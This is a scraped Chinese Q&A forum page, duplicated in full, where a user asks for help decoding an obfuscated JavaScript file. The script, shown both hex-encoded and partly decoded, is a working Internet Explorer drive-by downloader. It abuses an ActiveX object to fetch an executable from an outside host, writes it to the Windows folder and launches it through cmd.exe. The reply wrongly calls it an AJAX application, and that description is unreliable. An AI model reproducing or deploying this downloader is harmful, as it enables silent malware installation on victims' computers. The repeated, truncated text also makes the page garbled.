急帮小弟我解密下这个JS 文件 多谢了
日期:2014-05-18 浏览次数:20737 次
急急急!!!各位大哥帮我解密下这个JS 文件 谢谢了
function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return '\x7E\x74\x6D\x70 '+Math.round(mECH63)+ '\x2E\x65\x78\x65 ';}try{
var s5uMT2= "\x68\x74\x74\x70\x3A ";r5uMT2= "\x2F\x2F ";q5uMT2= "\x63\x63\x2E\x77\x7A\x78\x71\x79\x2E\x63\x6F\x6D\x2F\x77\x6D\x2F\x6D\x6D\x2E\x65\x78\x65 ";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe= "\x6F\x62\x6A\x65\x63\x74 ";yZRfe= "\x63\x6C\x61\x73\x73\x69\x64 ";zZRfe= "\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36 ";EZRfe= "\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D ";CckvV1= "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74 ";n2Sfe=(window[ "\x64\x6F\x63\x75\x6D\x65\x6E\x74 "][ "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74 "](BZRfe));n2Sfe[ "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65 "](yZRfe,zZRfe);var t9mmh2=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58 "+ "\x4D "+ "\x4C "+ "\x48 "+ "\x54 "+ "\x54 "+ "\x50 ", " ");var S=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](EZRfe, " ");S[ "\x74\x79\x70\x65 "]=1;t9mmh2[ "\x4F\x70\x65\x6E "]( "\x47\x45\x54 ",h2Sfe,0);t9mmh2[ "\x53\x65\x6E\x64 "]();tedHp3=cZRfe(10000);var F=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](CckvV1, " ");var AtAMT2=F[ "\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72 "](0);tedHp3=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2,tedHp3);S[ "\x6F\x70\x65\x6E "]();S[ "\x57\x72\x69\x74\x65 "](t9mmh2.responseBody);S[ "\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65 "](tedHp3,2);S[ "\x43\x6C\x6F\x73\x65 "]();var Q=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E ", " ");RokwV1=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2+ '\\\x73\x79\x73\x74\x65\x6D\x33\x32 ', '\x63\x6D\x64\x2E\x65\x78\x65 ');Q[ "\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65 "](RokwV1, '\x20\x2F\x63\x20 '+tedHp3, " ",open,0);}catch(c9mmh2){c9mmh2=1;}
------解决方案--------------------
\x74 之类的是 ASCII 码,将其“\x”替换成“\u00”使用 Java 工具可以转换:
native2ascii -reverse -encoding gb2312 a.txt b.txt
删掉一些“垃圾”拼合一下,就如下所示。不过,你提供的代码段不完全,好像少了一些代码。估计是一个 AJAX 应用。
function cZRfe(f9mmh2){
var mECH63 = Math.random() * f9mmh2;
return '~tmp ' + Math.round(mECH63) + '.exe ';
}
try{
n2Sfe = window.document.createElement( "object ");
n2Sfe.setAttribute( "classid ", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ");
var t9mmh2 = n2Sfe.CreateObject( "Microsoft.XMLHTTP ", " ");
var S = n2Sfe.CreateObject( "Adodb.Stream ", " ");
S.type = 1;
t9mmh2.Open( "GET ", "http://cc.wzxqy.com/wm/mm.exe ", 0);
t9mmh2.Send();
tedHp3 = cZRfe(10000);
var F = n2Sfe.CreateObject( "Scripting.FileSystemObject ", " ");
var AtAMT2 = F.GetSpecialFolder(0);
tedHp3 = F.BuildPath(AtAMT2, tedHp3);
S.open();
S.Write(t9mmh2.responseBody);
S.SaveToFile(tedHp3, 2);
S.Close();
var Q = n2Sfe.CreateObject( "Shell.App
function cZRfe(f9mmh2){var mECH63=Math.random()*f9mmh2;return '\x7E\x74\x6D\x70 '+Math.round(mECH63)+ '\x2E\x65\x78\x65 ';}try{
var s5uMT2= "\x68\x74\x74\x70\x3A ";r5uMT2= "\x2F\x2F ";q5uMT2= "\x63\x63\x2E\x77\x7A\x78\x71\x79\x2E\x63\x6F\x6D\x2F\x77\x6D\x2F\x6D\x6D\x2E\x65\x78\x65 ";h2Sfe=s5uMT2+r5uMT2+q5uMT2;BZRfe= "\x6F\x62\x6A\x65\x63\x74 ";yZRfe= "\x63\x6C\x61\x73\x73\x69\x64 ";zZRfe= "\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36 ";EZRfe= "\x41\x64\x6F\x64\x62\x2E\x53\x74\x72\x65\x61\x6D ";CckvV1= "\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74 ";n2Sfe=(window[ "\x64\x6F\x63\x75\x6D\x65\x6E\x74 "][ "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74 "](BZRfe));n2Sfe[ "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65 "](yZRfe,zZRfe);var t9mmh2=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58 "+ "\x4D "+ "\x4C "+ "\x48 "+ "\x54 "+ "\x54 "+ "\x50 ", " ");var S=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](EZRfe, " ");S[ "\x74\x79\x70\x65 "]=1;t9mmh2[ "\x4F\x70\x65\x6E "]( "\x47\x45\x54 ",h2Sfe,0);t9mmh2[ "\x53\x65\x6E\x64 "]();tedHp3=cZRfe(10000);var F=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "](CckvV1, " ");var AtAMT2=F[ "\x47\x65\x74\x53\x70\x65\x63\x69\x61\x6C\x46\x6F\x6C\x64\x65\x72 "](0);tedHp3=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2,tedHp3);S[ "\x6F\x70\x65\x6E "]();S[ "\x57\x72\x69\x74\x65 "](t9mmh2.responseBody);S[ "\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65 "](tedHp3,2);S[ "\x43\x6C\x6F\x73\x65 "]();var Q=n2Sfe[ "\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74 "]( "\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E ", " ");RokwV1=F[ "\x42\x75\x69\x6C\x64\x50\x61\x74\x68 "](AtAMT2+ '\\\x73\x79\x73\x74\x65\x6D\x33\x32 ', '\x63\x6D\x64\x2E\x65\x78\x65 ');Q[ "\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65 "](RokwV1, '\x20\x2F\x63\x20 '+tedHp3, " ",open,0);}catch(c9mmh2){c9mmh2=1;}
------解决方案--------------------
\x74 之类的是 ASCII 码,将其“\x”替换成“\u00”使用 Java 工具可以转换:
native2ascii -reverse -encoding gb2312 a.txt b.txt
删掉一些“垃圾”拼合一下,就如下所示。不过,你提供的代码段不完全,好像少了一些代码。估计是一个 AJAX 应用。
function cZRfe(f9mmh2){
var mECH63 = Math.random() * f9mmh2;
return '~tmp ' + Math.round(mECH63) + '.exe ';
}
try{
n2Sfe = window.document.createElement( "object ");
n2Sfe.setAttribute( "classid ", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 ");
var t9mmh2 = n2Sfe.CreateObject( "Microsoft.XMLHTTP ", " ");
var S = n2Sfe.CreateObject( "Adodb.Stream ", " ");
S.type = 1;
t9mmh2.Open( "GET ", "http://cc.wzxqy.com/wm/mm.exe ", 0);
t9mmh2.Send();
tedHp3 = cZRfe(10000);
var F = n2Sfe.CreateObject( "Scripting.FileSystemObject ", " ");
var AtAMT2 = F.GetSpecialFolder(0);
tedHp3 = F.BuildPath(AtAMT2, tedHp3);
S.open();
S.Write(t9mmh2.responseBody);
S.SaveToFile(tedHp3, 2);
S.Close();
var Q = n2Sfe.CreateObject( "Shell.App
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
